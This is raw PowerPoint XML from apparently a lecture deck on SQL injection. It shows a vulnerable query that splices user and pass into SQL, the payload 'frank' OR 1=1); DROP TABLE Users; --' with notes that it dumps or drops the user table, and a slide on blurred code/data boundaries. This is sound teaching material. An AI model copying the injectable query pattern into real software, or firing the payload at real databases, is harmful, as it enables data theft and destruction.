        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3537737" y="6813618"/>
            <a:ext cx="17732417" cy="149848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dirty="0"/>
              <a:t>result = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>db.execute </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4400">
                <a:solidFill>
                  <a:srgbClr val="010000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WHERE Name</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>‘#{</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AND P</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>assword=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#{</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>’;”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6773472" y="10609544"/>
            <a:ext cx="7939673" cy="16831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000" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>Always true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="584200" rtl="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(so: dumps whole user DB)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="5000" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
              <a:sym typeface="Helvetica Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15233762" y="11083650"/>
            <a:ext cx="5020604"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000" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>Commented out</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9656524" y="10546043"/>
            <a:ext cx="2279289" cy="63501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12430328" y="9432279"/>
            <a:ext cx="9645902" cy="1585180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1036617488"/>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67"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:se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15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="2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p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" fill="hold"/>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advAuto="0"/>
      <p:bldP spid="567" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="14" grpId="0"/>
      <p:bldP spid="15" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="17"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Shape 570"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3542551" y="6813618"/>
            <a:ext cx="17732417" cy="149848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 “SELECT * FROM Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4400">
                <a:solidFill>
                  <a:srgbClr val="010000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       WHERE Name=‘#{user}’ AND Password=‘#{pass}’;”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="571" name="Screen Shot 2014-02-18 at 1.58.14 AM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4129634" y="3208580"/>
            <a:ext cx="16124732" cy="1867075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="575" name="Group 575"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4353576" y="4244249"/>
            <a:ext cx="14333125" cy="1770414"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="14333124" cy="1770413"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="572" name="Shape 572"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="27454" y="814738"/>
              <a:ext cx="14305671" cy="955676"/>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b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:ea typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                  <a:sym typeface="Courier"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>frank’ OR 1=1); DROP TABLE Users; -- </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="573" name="Shape 573"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="-1" y="0"/>
              <a:ext cx="1525341" cy="805951"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="50800" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200"/>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="574" name="Shape 574"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3524103" y="1937"/>
              <a:ext cx="10263710" cy="756221"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="50800" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200"/>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="576" name="Shape 576"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2318537" y="9108318"/>
            <a:ext cx="19423586" cy="217559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 “SELECT * FROM Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4400">
                <a:solidFill>
                  <a:srgbClr val="010000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       WHERE Name=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>frank’ OR 1=1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4400">
                <a:solidFill>
                  <a:srgbClr val="010000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       DROP TABLE Users;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ AND</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>assword=‘whocares’;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>”;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="577" name="Shape 577"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4986895" y="11578610"/>
            <a:ext cx="14410210"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b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Can chain together statements with semicolon:</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>STATEMENT 1 ; STATEMENT 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 560">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AA818FE-1A03-4584-40AE-5B005BDE6C43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4599397" y="555020"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="394334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 name="exploits_of_a_mom.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3821951" y="3585829"/>
            <a:ext cx="16740098" cy="5152733"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="585" name="Shape 585"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8558781" y="10093333"/>
            <a:ext cx="597916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http://xkcd.com/327/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>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835579421"/>
      </p:ext>
    </p:extLst>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7" name="license-sql.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3897837" y="610449"/>
            <a:ext cx="16588325" cy="12495102"/>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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="541880797"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="1500">
        <p:cover dir="d"/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:cover dir="d"/>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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4625779" y="448562"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>The underlying issue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="592" name="Shape 592"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387453" y="5758279"/>
            <a:ext cx="15609094" cy="7077569"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>This one string combines the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> and the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Similar to buffer overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploits</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="593" name="Shape 593"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3537737" y="2751016"/>
            <a:ext cx="17732417" cy="1498486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>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 “SELECT * FROM Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4400">
                <a:solidFill>
                  <a:srgbClr val="010000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       WHERE Name=‘#{user}’ AND Password=‘#{pass}’;”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="594" name="Shape 594"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4528628" y="9840265"/>
            <a:ext cx="15326743"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b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>When the boundary between code and data blurs,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>we open ourselves up to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exploits</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="595" name="Picture 594"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13199749" y="5471616"/>
            <a:ext cx="5826851" cy="1585180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="597" name="Picture 596"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="18278022">
            <a:off x="17658634" y="5070779"/>
            <a:ext cx="1702394" cy="80237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="599" name="Picture 598"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="12544948">
            <a:off x="10922637" y="5137305"/>
            <a:ext cx="2998699" cy="127001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="601" name="Picture 600"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10466309" y="4433331"/>
            <a:ext cx="1623050" cy="127001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="603" name="Picture 602"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="18147707" y="4433331"/>
            <a:ext cx="1623051" cy="127001"/>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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1619986788"/>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595"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="595"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="8" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="599"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="599"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
